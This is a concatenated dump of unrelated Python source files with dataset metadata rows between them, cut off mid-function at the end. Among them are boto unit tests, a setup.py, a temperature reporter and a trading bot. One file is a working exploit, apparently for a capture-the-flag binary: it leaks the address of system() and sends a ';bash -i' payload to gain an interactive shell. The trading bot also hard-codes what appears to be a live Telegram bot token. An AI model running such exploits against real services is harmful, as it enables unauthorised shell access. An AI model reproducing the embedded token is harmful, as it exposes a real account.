    load_path = custom_load_path if custom_load_path is not None else args.load
    # The tracker file contains the latest checkpointed iteration number.
    tracker_filename = get_checkpoint_tracker_filename(load_path)
    with open(tracker_filename, 'r') as f:
        iteration = int(f.read().strip())
    checkpoint_name = get_checkpoint_name(load_path, iteration, False)
    if mpu.get_data_parallel_rank() == 0:
        print('global rank {} is loading checkpoint {}'.format(
            torch.distributed.get_rank(), checkpoint_name))
    state_dict = torch.load(checkpoint_name, map_location='cpu')
    ret_state_dict = state_dict['model']
    # Optionally keep only one of the two towers.
    if only_query_model:
        ret_state_dict.pop('context_model')
    if only_context_model:
        ret_state_dict.pop('query_model')
    assert len(model) == 1
    model[0].load_state_dict(ret_state_dict)
    torch.distributed.barrier()
    if mpu.get_data_parallel_rank() == 0:
        print(' successfully loaded {}'.format(checkpoint_name))
    return model
| true | true |
f7328e07aa94a65699960aed21b01b92175dfc88 | 1,011 | py | Python | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | random_stuff/telnetlib_logging.py | adw1n/competitive-programming | b28a166e7c93d7b239c0a6b09eafd6020685afdf | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python3
import telnetlib
import struct
import logging
HOST="localhost"
# Vulnerable target can be served with:
#while true; do nc -l -p 1111 -e /tmp/vuln; done
# Monkey-patch Telnet.write / Telnet.read_until so every byte sent and
# received is echoed to stdout (decoded as UTF-8 when possible).
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
    # Log outgoing bytes, then delegate to the original implementation.
    try:
        print("w: ",str_.decode("utf-8"))
    except UnicodeDecodeError:
        print("w: ",str_)
    old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
    # Log incoming bytes before handing them back to the caller.
    s=old_read_until(self,*args, **kwargs)
    try:
        print("r: ", s.decode("utf-8"))
    except UnicodeDecodeError:
        print("r: ",s)
    return s
telnetlib.Telnet.read_until=read_until
# Exploit flow: menu option 4 prints help text containing "- 0x<addr>",
# from which the address of system() is parsed.
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
tn.write(b"1\n")
tn.read_until(match=b": ")
# Pack the leaked address as a 32-bit little-endian pointer.
system=struct.pack("I",system)
# NOTE(review): payload layout (command string, 4 NUL padding bytes, then
# the pointer) presumably matches the target binary's buffer — verify.
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| 23.511628 | 61 | 0.67458 |
import telnetlib
import struct
import logging
HOST="localhost"
# Wrap Telnet.write / Telnet.read_until so all traffic is logged to stdout.
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
    # Log outgoing bytes, then call the original write.
    try:
        print("w: ",str_.decode("utf-8"))
    except UnicodeDecodeError:
        print("w: ",str_)
    old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
    # Log incoming bytes before returning them.
    s=old_read_until(self,*args, **kwargs)
    try:
        print("r: ", s.decode("utf-8"))
    except UnicodeDecodeError:
        print("r: ",s)
    return s
telnetlib.Telnet.read_until=read_until
# Leak the address of system() from the help text, then send a payload
# that redirects execution to it (command string + padding + pointer).
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
tn.write(b"1\n")
tn.read_until(match=b": ")
system=struct.pack("I",system)
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| true | true |
f7328e7d8e965d4fc8718dd18bf2b119145af16a | 9,759 | py | Python | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | 1 | 2021-04-30T05:26:20.000Z | 2021-04-30T05:26:20.000Z | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | null | null | null | platform/gsutil/third_party/boto/tests/unit/utils/test_utils.py | IsaacHuang/google-cloud-sdk | 52afa5d1a75dff08f4f5380c5cccc015bf796ca5 | [
"Apache-2.0"
] | 2 | 2020-07-25T05:03:06.000Z | 2020-11-04T04:55:57.000Z | # Copyright (c) 2010 Robert Mela
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
try:
import unittest2 as unittest
except ImportError:
import unittest
import datetime
import hashlib
import hmac
import locale
import mock
import thread
import time
import boto.utils
from boto.utils import Password
from boto.utils import pythonize_name
from boto.utils import _build_instance_metadata_url
from boto.utils import get_instance_userdata
from boto.utils import retry_url
from boto.utils import LazyLoadMetadata
from boto.compat import json
@unittest.skip("http://bugs.python.org/issue7980")
class TestThreadImport(unittest.TestCase):
    """Regression test for the CPython strptime thread-safety bug (skipped).

    Python 2 only (uses ``xrange`` and the ``thread`` module).
    """
    def test_strptime(self):
        # Hammer parse_ts from several threads; the referenced bug made the
        # first strptime import crash under concurrency.
        def f():
            for m in xrange(1, 13):
                for d in xrange(1,29):
                    boto.utils.parse_ts('2013-01-01T00:00:00Z')
        for _ in xrange(10):
            thread.start_new_thread(f, ())
        time.sleep(3)
class TestPassword(unittest.TestCase):
    """Test basic password functionality"""
    def clstest(self, cls):
        """Insure that password.__eq__ hashes test value before compare."""
        password = cls('foo')
        # A freshly constructed password holds the *hash*, not the plaintext.
        self.assertNotEquals(password, 'foo')
        password.set('foo')
        hashed = str(password)
        self.assertEquals(password, 'foo')
        self.assertEquals(password.str, hashed)
        # Re-constructing from the hash compares equal to the plaintext.
        password = cls(hashed)
        self.assertNotEquals(password.str, 'foo')
        self.assertEquals(password, 'foo')
        self.assertEquals(password.str, hashed)
    def test_aaa_version_1_9_default_behavior(self):
        # Default hash function behavior (named 'aaa' to run first).
        self.clstest(Password)
    def test_custom_hashclass(self):
        # Subclasses may override ``hashfunc`` with another hashlib function.
        class SHA224Password(Password):
            hashfunc = hashlib.sha224
        password = SHA224Password()
        password.set('foo')
        self.assertEquals(hashlib.sha224('foo').hexdigest(), str(password))
    def test_hmac(self):
        # ``hashfunc`` may also be a keyed HMAC factory.
        def hmac_hashfunc(cls, msg):
            return hmac.new('mysecretkey', msg)
        class HMACPassword(Password):
            hashfunc = hmac_hashfunc
        self.clstest(HMACPassword)
        password = HMACPassword()
        password.set('foo')
        self.assertEquals(str(password),
                          hmac.new('mysecretkey', 'foo').hexdigest())
    def test_constructor(self):
        # ``hashfunc`` can also be supplied per instance via the constructor.
        hmac_hashfunc = lambda msg: hmac.new('mysecretkey', msg)
        password = Password(hashfunc=hmac_hashfunc)
        password.set('foo')
        self.assertEquals(password.str,
                          hmac.new('mysecretkey', 'foo').hexdigest())
class TestPythonizeName(unittest.TestCase):
    """Unit tests for boto.utils.pythonize_name (CamelCase -> snake_case)."""
    def _check(self, raw, expected):
        # Shared assertion helper for all conversion cases.
        self.assertEqual(pythonize_name(raw), expected)
    def test_empty_string(self):
        self._check('', '')
    def test_all_lower_case(self):
        self._check('lowercase', 'lowercase')
    def test_all_upper_case(self):
        self._check('UPPERCASE', 'uppercase')
    def test_camel_case(self):
        self._check('OriginallyCamelCased', 'originally_camel_cased')
    def test_already_pythonized(self):
        self._check('already_pythonized', 'already_pythonized')
    def test_multiple_upper_cased_letters(self):
        self._check('HTTPRequest', 'http_request')
        self._check('RequestForHTTP', 'request_for_http')
    def test_string_with_numbers(self):
        self._check('HTTPStatus200Ok', 'http_status_200_ok')
class TestBuildInstanceMetadataURL(unittest.TestCase):
    """Tests URL assembly for the EC2 instance-metadata service endpoint."""
    def test_normal(self):
        # This is the all-defaults case.
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            'latest',
            'meta-data/'
        ),
            'http://169.254.169.254/latest/meta-data/'
        )
    def test_custom_path(self):
        # Non-default data path (e.g. dynamic/ instead of meta-data/).
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            'latest',
            'dynamic/'
        ),
            'http://169.254.169.254/latest/dynamic/'
        )
    def test_custom_version(self):
        # Pinned API version instead of 'latest'.
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            '1.0',
            'meta-data/'
        ),
            'http://169.254.169.254/1.0/meta-data/'
        )
    def test_custom_url(self):
        # Non-default metadata host.
        self.assertEqual(_build_instance_metadata_url(
            'http://10.0.1.5',
            'latest',
            'meta-data/'
        ),
            'http://10.0.1.5/latest/meta-data/'
        )
    def test_all_custom(self):
        # Host, version and path all overridden at once.
        self.assertEqual(_build_instance_metadata_url(
            'http://10.0.1.5',
            '2013-03-22',
            'user-data'
        ),
            'http://10.0.1.5/2013-03-22/user-data'
        )
class TestRetryURL(unittest.TestCase):
    """Tests that retry_url bypasses any configured HTTP proxy."""
    def setUp(self):
        # Patch both urlopen (proxy-aware) and build_opener (no-proxy path).
        self.urlopen_patch = mock.patch('urllib2.urlopen')
        self.opener_patch = mock.patch('urllib2.build_opener')
        self.urlopen = self.urlopen_patch.start()
        self.opener = self.opener_patch.start()
    def tearDown(self):
        self.urlopen_patch.stop()
        self.opener_patch.stop()
    def set_normal_response(self, response):
        # Response returned by the plain urlopen path.
        fake_response = mock.Mock()
        fake_response.read.return_value = response
        self.urlopen.return_value = fake_response
    def set_no_proxy_allowed_response(self, response):
        # Response returned by the explicitly proxy-free opener path.
        fake_response = mock.Mock()
        fake_response.read.return_value = response
        self.opener.return_value.open.return_value = fake_response
    def test_retry_url_uses_proxy(self):
        self.set_normal_response('normal response')
        self.set_no_proxy_allowed_response('no proxy response')
        response = retry_url('http://10.10.10.10/foo', num_retries=1)
        # Metadata requests must go through the proxy-free opener.
        self.assertEqual(response, 'no proxy response')
class TestLazyLoadMetadata(unittest.TestCase):
    """Tests retry behavior of LazyLoadMetadata on malformed JSON values."""
    def setUp(self):
        self.retry_url_patch = mock.patch('boto.utils.retry_url')
        boto.utils.retry_url = self.retry_url_patch.start()
    def tearDown(self):
        self.retry_url_patch.stop()
    def set_normal_response(self, data):
        # here "data" should be a list of return values in some order,
        # consumed one per retry_url call (mock side_effect semantics)
        fake_response = mock.Mock()
        fake_response.side_effect = data
        boto.utils.retry_url = fake_response
    def test_meta_data_with_invalid_json_format_happened_once(self):
        # here "key_data" will be stored in the "self._leaves"
        # when the class "LazyLoadMetadata" initialized
        key_data = "test"
        invalid_data = '{"invalid_json_format" : true,}'
        valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
        url = "/".join(["http://169.254.169.254", key_data])
        num_retries = 2
        # One bad payload followed by a good one: the retry must succeed.
        self.set_normal_response([key_data, invalid_data, valid_data])
        response = LazyLoadMetadata(url, num_retries)
        self.assertEqual(response.values()[0], json.loads(valid_data))
    def test_meta_data_with_invalid_json_format_happened_twice(self):
        key_data = "test"
        invalid_data = '{"invalid_json_format" : true,}'
        valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
        url = "/".join(["http://169.254.169.254", key_data])
        num_retries = 2
        # Bad payload on every retry: the error must propagate.
        self.set_normal_response([key_data, invalid_data, invalid_data])
        response = LazyLoadMetadata(url, num_retries)
        with self.assertRaises(ValueError):
            response.values()[0]
    def test_user_data(self):
        self.set_normal_response(['foo'])
        userdata = get_instance_userdata()
        self.assertEqual('foo', userdata)
        # user-data fetches must not retry on 404 (absent user data is valid).
        boto.utils.retry_url.assert_called_with(
            'http://169.254.169.254/latest/user-data',
            retry_on_404=False)
class TestStringToDatetimeParsing(unittest.TestCase):
    """ Test string to datetime parsing """
    def setUp(self):
        # Force a non-US locale so month/day names differ from English.
        self._saved = locale.setlocale(locale.LC_ALL)
        locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
    def tearDown(self):
        locale.setlocale(locale.LC_ALL, self._saved)
    def test_nonus_locale(self):
        test_string = 'Thu, 15 May 2014 09:06:03 GMT'
        # Default strptime should fail (locale-dependent month/day names)
        with self.assertRaises(ValueError):
            datetime.datetime.strptime(test_string, boto.utils.RFC1123)
        # Our parser should succeed regardless of the active locale
        result = boto.utils.parse_ts(test_string)
        self.assertEqual(2014, result.year)
        self.assertEqual(5, result.month)
        self.assertEqual(15, result.day)
        self.assertEqual(9, result.hour)
        self.assertEqual(6, result.minute)
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| 33.307167 | 81 | 0.650579 |
try:
import unittest2 as unittest
except ImportError:
import unittest
import datetime
import hashlib
import hmac
import locale
import mock
import thread
import time
import boto.utils
from boto.utils import Password
from boto.utils import pythonize_name
from boto.utils import _build_instance_metadata_url
from boto.utils import get_instance_userdata
from boto.utils import retry_url
from boto.utils import LazyLoadMetadata
from boto.compat import json
@unittest.skip("http://bugs.python.org/issue7980")
class TestThreadImport(unittest.TestCase):
    """Regression test for the CPython strptime thread-safety bug (skipped; Python 2 only)."""
    def test_strptime(self):
        def f():
            for m in xrange(1, 13):
                for d in xrange(1,29):
                    boto.utils.parse_ts('2013-01-01T00:00:00Z')
        # Spawn workers and give them time to race on the strptime import.
        for _ in xrange(10):
            thread.start_new_thread(f, ())
        time.sleep(3)
class TestPassword(unittest.TestCase):
    """Tests that boto.utils.Password hashes values before comparison."""
    def clstest(self, cls):
        # Shared check: equality hashes the candidate before comparing.
        password = cls('foo')
        self.assertNotEquals(password, 'foo')
        password.set('foo')
        hashed = str(password)
        self.assertEquals(password, 'foo')
        self.assertEquals(password.str, hashed)
        password = cls(hashed)
        self.assertNotEquals(password.str, 'foo')
        self.assertEquals(password, 'foo')
        self.assertEquals(password.str, hashed)
    def test_aaa_version_1_9_default_behavior(self):
        self.clstest(Password)
    def test_custom_hashclass(self):
        # hashfunc may be overridden with any hashlib constructor.
        class SHA224Password(Password):
            hashfunc = hashlib.sha224
        password = SHA224Password()
        password.set('foo')
        self.assertEquals(hashlib.sha224('foo').hexdigest(), str(password))
    def test_hmac(self):
        # hashfunc may also be a keyed HMAC factory.
        def hmac_hashfunc(cls, msg):
            return hmac.new('mysecretkey', msg)
        class HMACPassword(Password):
            hashfunc = hmac_hashfunc
        self.clstest(HMACPassword)
        password = HMACPassword()
        password.set('foo')
        self.assertEquals(str(password),
                          hmac.new('mysecretkey', 'foo').hexdigest())
    def test_constructor(self):
        # hashfunc can be supplied per instance via the constructor.
        hmac_hashfunc = lambda msg: hmac.new('mysecretkey', msg)
        password = Password(hashfunc=hmac_hashfunc)
        password.set('foo')
        self.assertEquals(password.str,
                          hmac.new('mysecretkey', 'foo').hexdigest())
class TestPythonizeName(unittest.TestCase):
    """Unit tests for boto.utils.pythonize_name (CamelCase -> snake_case)."""
    def test_empty_string(self):
        self.assertEqual(pythonize_name(''), '')
    def test_all_lower_case(self):
        self.assertEqual(pythonize_name('lowercase'), 'lowercase')
    def test_all_upper_case(self):
        self.assertEqual(pythonize_name('UPPERCASE'), 'uppercase')
    def test_camel_case(self):
        self.assertEqual(pythonize_name('OriginallyCamelCased'),
                         'originally_camel_cased')
    def test_already_pythonized(self):
        self.assertEqual(pythonize_name('already_pythonized'),
                         'already_pythonized')
    def test_multiple_upper_cased_letters(self):
        # Acronym runs collapse to a single lower-cased word.
        self.assertEqual(pythonize_name('HTTPRequest'), 'http_request')
        self.assertEqual(pythonize_name('RequestForHTTP'), 'request_for_http')
    def test_string_with_numbers(self):
        self.assertEqual(pythonize_name('HTTPStatus200Ok'), 'http_status_200_ok')
class TestBuildInstanceMetadataURL(unittest.TestCase):
    """Tests URL assembly for the EC2 instance-metadata service endpoint."""
    def test_normal(self):
        # All-defaults case: default host, 'latest' version, meta-data/ path.
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            'latest',
            'meta-data/'
        ),
            'http://169.254.169.254/latest/meta-data/'
        )
    def test_custom_path(self):
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            'latest',
            'dynamic/'
        ),
            'http://169.254.169.254/latest/dynamic/'
        )
    def test_custom_version(self):
        self.assertEqual(_build_instance_metadata_url(
            'http://169.254.169.254',
            '1.0',
            'meta-data/'
        ),
            'http://169.254.169.254/1.0/meta-data/'
        )
    def test_custom_url(self):
        self.assertEqual(_build_instance_metadata_url(
            'http://10.0.1.5',
            'latest',
            'meta-data/'
        ),
            'http://10.0.1.5/latest/meta-data/'
        )
    def test_all_custom(self):
        self.assertEqual(_build_instance_metadata_url(
            'http://10.0.1.5',
            '2013-03-22',
            'user-data'
        ),
            'http://10.0.1.5/2013-03-22/user-data'
        )
class TestRetryURL(unittest.TestCase):
    """Tests that retry_url bypasses any configured HTTP proxy."""
    def setUp(self):
        self.urlopen_patch = mock.patch('urllib2.urlopen')
        self.opener_patch = mock.patch('urllib2.build_opener')
        self.urlopen = self.urlopen_patch.start()
        self.opener = self.opener_patch.start()
    def tearDown(self):
        self.urlopen_patch.stop()
        self.opener_patch.stop()
    def set_normal_response(self, response):
        # Response for the plain (proxy-aware) urlopen path.
        fake_response = mock.Mock()
        fake_response.read.return_value = response
        self.urlopen.return_value = fake_response
    def set_no_proxy_allowed_response(self, response):
        # Response for the explicitly proxy-free opener path.
        fake_response = mock.Mock()
        fake_response.read.return_value = response
        self.opener.return_value.open.return_value = fake_response
    def test_retry_url_uses_proxy(self):
        self.set_normal_response('normal response')
        self.set_no_proxy_allowed_response('no proxy response')
        response = retry_url('http://10.10.10.10/foo', num_retries=1)
        self.assertEqual(response, 'no proxy response')
class TestLazyLoadMetadata(unittest.TestCase):
    """Tests retry behavior of LazyLoadMetadata on malformed JSON values."""
    def setUp(self):
        self.retry_url_patch = mock.patch('boto.utils.retry_url')
        boto.utils.retry_url = self.retry_url_patch.start()
    def tearDown(self):
        self.retry_url_patch.stop()
    def set_normal_response(self, data):
        # *data* is a list of return values, consumed one per retry_url call.
        fake_response = mock.Mock()
        fake_response.side_effect = data
        boto.utils.retry_url = fake_response
    def test_meta_data_with_invalid_json_format_happened_once(self):
        # One bad payload followed by a good one: the retry must succeed.
        key_data = "test"
        invalid_data = '{"invalid_json_format" : true,}'
        valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
        url = "/".join(["http://169.254.169.254", key_data])
        num_retries = 2
        self.set_normal_response([key_data, invalid_data, valid_data])
        response = LazyLoadMetadata(url, num_retries)
        self.assertEqual(response.values()[0], json.loads(valid_data))
    def test_meta_data_with_invalid_json_format_happened_twice(self):
        # Bad payload on every retry: the ValueError must propagate.
        key_data = "test"
        invalid_data = '{"invalid_json_format" : true,}'
        valid_data = '{ "%s" : {"valid_json_format": true}}' % key_data
        url = "/".join(["http://169.254.169.254", key_data])
        num_retries = 2
        self.set_normal_response([key_data, invalid_data, invalid_data])
        response = LazyLoadMetadata(url, num_retries)
        with self.assertRaises(ValueError):
            response.values()[0]
    def test_user_data(self):
        self.set_normal_response(['foo'])
        userdata = get_instance_userdata()
        self.assertEqual('foo', userdata)
        # user-data fetches must not retry on 404 (absent user data is valid).
        boto.utils.retry_url.assert_called_with(
            'http://169.254.169.254/latest/user-data',
            retry_on_404=False)
class TestStringToDatetimeParsing(unittest.TestCase):
    """Tests locale-independent timestamp parsing in boto.utils.parse_ts."""
    def setUp(self):
        # Force a non-US locale so English month/day names are not the default.
        self._saved = locale.setlocale(locale.LC_ALL)
        locale.setlocale(locale.LC_ALL, 'de_DE.UTF-8')
    def tearDown(self):
        locale.setlocale(locale.LC_ALL, self._saved)
    def test_nonus_locale(self):
        test_string = 'Thu, 15 May 2014 09:06:03 GMT'
        # Plain strptime is locale-dependent and must fail here.
        with self.assertRaises(ValueError):
            datetime.datetime.strptime(test_string, boto.utils.RFC1123)
        # parse_ts must succeed regardless of the active locale.
        result = boto.utils.parse_ts(test_string)
        self.assertEqual(2014, result.year)
        self.assertEqual(5, result.month)
        self.assertEqual(15, result.day)
        self.assertEqual(9, result.hour)
        self.assertEqual(6, result.minute)
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| true | true |
f7328f2ec786dc897da0bb3735ef8a755cd94bc3 | 772 | py | Python | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | 3 | 2021-08-01T00:31:50.000Z | 2021-12-15T23:42:52.000Z | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | null | null | null | Armadillo-IoT_GW/modules/reporters/temperature_reporter.py | naomitodori/Azure-IoT-samples | f98ad55eaab0d3fe52a5ff17a8d312aa69df0cce | [
"MIT"
] | 3 | 2021-12-07T13:18:44.000Z | 2022-01-28T00:41:46.000Z | from modules.lib.reporter import Reporter
from modules.lib.report import Report
from modules.lib.alarm_machine import AlarmMachine
class TemperatureReporter(Reporter):
    """Reporter that samples the SoC temperature from sysfs thermal zone 0."""
    def data_type(self):
        """Name of the measurement this reporter produces."""
        return 'temperature'
    def report(self):
        """Read the zone-0 temperature and return a (report, alarm) pair.

        The sysfs file reports millidegrees Celsius, hence the /1000
        conversion; ``alarm`` is None when no alarm machine is configured.
        """
        with open('/sys/class/thermal/thermal_zone0/temp') as sysfs_file:
            celsius = int(sysfs_file.read()) / 1000.0
        measurement = Report.report_now(
            'measurement',
            type='temperature',
            key='zone_0',
            value=celsius,
            unit='c'
        )
        alarm = None
        if self.alarm_machine() is not None:
            alarm = self.alarm_machine().judge('temperature', celsius,
                                               measurement.reported_at)
        return measurement, alarm
| 29.692308 | 67 | 0.576425 | from modules.lib.reporter import Reporter
from modules.lib.report import Report
from modules.lib.alarm_machine import AlarmMachine
class TemperatureReporter(Reporter):
    """Reporter that samples the SoC temperature from sysfs thermal zone 0."""
    def data_type(self):
        """Name of the measurement this reporter produces."""
        return 'temperature'
    def report(self):
        """Read the zone-0 temperature and return a (report, alarm) pair."""
        # sysfs reports millidegrees Celsius; convert to degrees.
        with open('/sys/class/thermal/thermal_zone0/temp') as file:
            temp = int(file.read()) / float(1000)
        report = Report.report_now(
            'measurement',
            type='temperature',
            key='zone_0',
            value=temp,
            unit='c'
        )
        # alarm stays None when no alarm machine is configured.
        alarm = None
        if self.alarm_machine() is not None:
            alarm = self.alarm_machine().judge('temperature', temp,
                                               report.reported_at)
        return report, alarm
f73290c0fd0677b07fe0cd79a344a6e52fbf148d | 733 | py | Python | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | null | null | null | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | 1 | 2021-04-07T13:16:00.000Z | 2021-04-07T13:16:00.000Z | setup.py | consideRatio/the-littlest-jupyterhub | 9179365a4ff9d5642a12df09b6d0b4271097fed6 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='the-littlest-jupyterhub',
version='0.1',
description='A small JupyterHub distribution',
url='https://github.com/jupyterhub/the-littlest-jupyterhub',
author='Jupyter Development Team',
author_email='jupyter@googlegroups.com',
license='3 Clause BSD',
packages=find_packages(),
include_package_data=True,
install_requires=[
'ruamel.yaml==0.15.*',
'jinja2',
'pluggy>0.7<1.0',
'passlib',
'backoff',
'requests',
'bcrypt',
'jupyterhub-traefik-proxy==0.2.*',
],
entry_points={
'console_scripts': [
'tljh-config = tljh.config:main',
]
},
)
| 25.275862 | 64 | 0.594816 | from setuptools import setup, find_packages
# Packaging metadata for The Littlest JupyterHub distribution.
setup(
    name='the-littlest-jupyterhub',
    version='0.1',
    description='A small JupyterHub distribution',
    url='https://github.com/jupyterhub/the-littlest-jupyterhub',
    author='Jupyter Development Team',
    author_email='jupyter@googlegroups.com',
    license='3 Clause BSD',
    packages=find_packages(),
    include_package_data=True,
    install_requires=[
        'ruamel.yaml==0.15.*',
        'jinja2',
        # NOTE(review): '>0.7<1.0' is not a valid PEP 508 specifier
        # (missing comma between the bounds) — should be '>0.7,<1.0'.
        'pluggy>0.7<1.0',
        'passlib',
        'backoff',
        'requests',
        'bcrypt',
        'jupyterhub-traefik-proxy==0.2.*',
    ],
    entry_points={
        # Installs the 'tljh-config' command-line entry point.
        'console_scripts': [
            'tljh-config = tljh.config:main',
        ]
    },
)
| true | true |
f73290d84c37138805df43d4dc3c217150c2e691 | 11,133 | py | Python | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | brain.py | hugodemenez/HistoricalMemoryTradingAlgorithm | d51d14632d0ffade27383bb8672c2ece450665a2 | [
"MIT"
] | null | null | null | r"""
Ce programme sert à ouvrir, gérer et fermer les positions.
Enregistre les positions dans la base de données et dans un fichier excel,
les affiches dans le terminal puis envoie une notification au groupe telegram
"""
import time,datetime,os,sys,requests
from brokerconnection import realcommands
from prediction import Prediction
from settings import Settings
from database import Database
from position import Position
from csv_generator import csv_generator
#Definition of variables
# NOTE(review): these module-level singletons rebind the imported class
# names (Position, Settings, Database) to instances, shadowing the classes
# for the rest of this module -- intentional here, but easy to trip over.
Position=Position()
Settings=Settings()
Database=Database()
def current_second():
    """Return the seconds component (0-59) of the current local time."""
    now = datetime.datetime.now()
    return now.second
def cls():
    """Clear the terminal screen (``cls`` on Windows, ``clear`` on POSIX)."""
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
def open_position(symbol):
    """
    Open a long position on *symbol* via the broker (or simulate one when
    backtesting) and record the opening state on the Position singleton.

    Returns True on success, False when the live limit order errored.
    """
    if Position.backtesting == False:
        # Live mode: place a real limit order and use its fill price.
        order = realcommands().limit_open(symbol=symbol,backtesting=Position.backtesting)
        if order['error']==True:
            return False
        Position.open_price=float(order['order']['price'])
        current_price = Settings.broker.price(symbol)['ask']
    else:
        # Backtesting: wait briefly, then take the current ask as the fill.
        time.sleep(2)
        current_price = Settings.broker.price(symbol)['ask']
        Position.open_price = current_price
    Position.symbol=symbol
    Position.current_price =current_price
    #Setting highest price and lowest price to the opening price
    Position.highest_price=Position.open_price
    Position.lowest_price=Position.open_price
    Position.status='open'
    Position.number+=1
    Position.time=time.time()  # opening timestamp (epoch seconds)
    return True
def close_position():
    """
    Mark the current position closed, fold its net yield into the running
    total, track the best total yield seen, and persist/notify the result.

    Assumes Position.close_price and Position.close_mode were set by the
    caller before invoking this function.
    """
    Position.status='close'
    Position.stoploss = False
    # Net yield of this position after fees.
    Position.effective_yield = effective_yield_calculation(Position.close_price,Position.open_price,Settings.fee)
    Position.total_yield = round(Position.total_yield*Position.effective_yield,5)
    if Position.total_yield > Position.highest_yield:
        Position.highest_yield = Position.total_yield
    save_position()
    return
def save_position():
    """
    Send a Telegram notification with the running yield and upsert the
    closed position's details into the ``positions`` database table.

    Any failure is reported via program_notification instead of being
    raised, so trading is never interrupted by persistence errors.
    """
    try:
        date = time.time()  # closing timestamp (epoch seconds)
        text=''
        text+="\nRendement : "+str(round((Position.total_yield-1)*100,2))+' %'
        program_notification(message=text)
        #Saving position into database
        Database.database_request(
            sql=("""REPLACE INTO positions (paire,opening_date,closing_date,duration,opening_price,closing_price,exit_way,highest_price,lowest_price,position_yield,total_yield) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""),
            params=(
                Position.symbol,
                datetime.datetime.fromtimestamp(Position.time),
                datetime.datetime.fromtimestamp(date),
                # Duration rendered as H:MM:SS from rounded timestamps.
                str(datetime.timedelta(seconds=round(date,0)-round(Position.time,0))),
                Position.open_price,
                Position.close_price,
                Position.close_mode,
                Position.highest_price,
                Position.lowest_price,
                Position.effective_yield,
                Position.total_yield,
            ),
            commit=True
        )
        return
    except Exception as error:
        # Best-effort: surface the failure to the Telegram group.
        program_notification(message=error)
def program_notification(message):
    """Send *message* to the configured Telegram group chat.

    Failures are printed and swallowed so a notification problem never
    interrupts trading.
    """
    try:
        # NOTE(review): credentials are hard-coded; they should live in
        # configuration or environment variables.
        token = "1813447727:AAHDPI54DetjXDDNFCMqtN-7phGvwNy9rqY"
        chat_id = "-431364858"
        url = f"https://api.telegram.org/bot{token}/sendMessage"
